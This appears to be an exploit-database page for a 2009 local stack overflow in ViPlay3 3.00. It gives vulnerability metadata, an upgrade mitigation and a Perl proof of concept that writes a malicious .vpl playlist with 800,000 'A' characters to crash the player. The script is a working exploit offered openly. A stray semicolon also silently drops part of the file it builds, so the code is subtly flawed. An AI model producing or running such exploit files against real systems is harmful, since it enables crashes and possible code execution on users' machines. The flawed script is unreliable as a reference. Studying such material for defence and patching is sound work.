header-logo
Suggest Exploit
vendor:
ViPlay3
by:
Gjoko 'LiquidWorm' Krstic
7,8
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: ViPlay3
Affected Version From: 3.00
Affected Version To: 3.00
Patch Exists: YES
Related CWE: N/A
CPE: a:urusoft:viplay3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (English)
2009

ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

This exploit is for ViPlay3 version 3.00 or lower. It is a local stack overflow vulnerability that can be exploited by creating a malicious .vpl file. The malicious file contains a large number of 'A' characters which causes a stack overflow when the file is opened. This can lead to arbitrary code execution.

Mitigation:

Upgrade to the latest version of ViPlay3, which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

#/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

$b= "[General]\r\n".
    "Title=Proof of Concept\r\n".
    "Author=LiquidWorm\r\n".
    "Comments=2009\r\n".
    "Version=1.0\r\n".
    "[Files]\r\n";
    "Count=800000\r\n".
    "LastPlayed=0\r\n";
$c= "1=" . "A" x 800000 . "\r\n";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";

# milw0rm.com [2009-05-08]

Navigation

Suggest Exploit

Services By CQR